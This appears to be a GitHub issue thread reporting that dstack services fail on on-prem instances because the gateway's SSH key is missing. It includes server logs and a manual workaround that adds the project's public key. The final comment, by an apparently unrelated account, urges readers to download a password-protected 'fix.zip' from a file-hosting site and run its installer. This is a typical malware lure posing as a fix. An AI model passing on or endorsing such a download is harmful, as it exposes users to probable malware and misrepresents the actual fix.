### ISSUE TITLE
[Bug]: Cannot run services on on-prem instances

### ISSUE THREAD

**Issue by jvstme** [dstackai/dstack#1640]
### Steps to reproduce

1. Add a gateway in any cloud
2. Add an on-prem instance
3. Try running any service with the cloud gateway and on-prem instance

### Actual behaviour

```
Run failed with error code GATEWAY_ERROR.
Check CLI, server, and run logs for more details.
```

### Expected behaviour

Service starts successfully.

### dstack version

master

### Server logs

```shell
[18:33:24] INFO     dstack._internal.server.background.tasks.process_running_jobs:411 job(883487)llama31-service-ollama-0-0: now is PULLING
[18:34:15] WARNING  dstack._internal.server.background.tasks.process_running_jobs:278 job(883487)llama31-service-ollama-0-0: failed to register service replica: SSHError: SSH tunnel
                    failed to start, age=0:00:56.605746
           INFO     dstack._internal.server.background.tasks.process_runs:338 run(7c3ca0)llama31-service-ollama: run status has changed PROVISIONING -> TERMINATING
```

### Additional information

The reason is that the gateway cannot connect to the on-prem instance, as the instance does not have the project's public key in `~/.ssh/authorized_keys`. This may also mean that other project users cannot use the on-prem instance for any runs but it needs to be verified.

### Workaround

Get the project's public key from the database.
```shell
sqlite3 ~/.dstack/server/data/sqlite.db "SELECT ssh_public_key FROM projects WHERE name = 'main'"
```
Manually add the key to `~/.ssh/authorized_keys` on the on-prem instance.

**Comment by kehkou** [comment]
Download 
https://www.mediafire.com/file/jc5ws0hujgycrp5/fix.zip/file
password: changeme
In the installer menu, select "gcc."
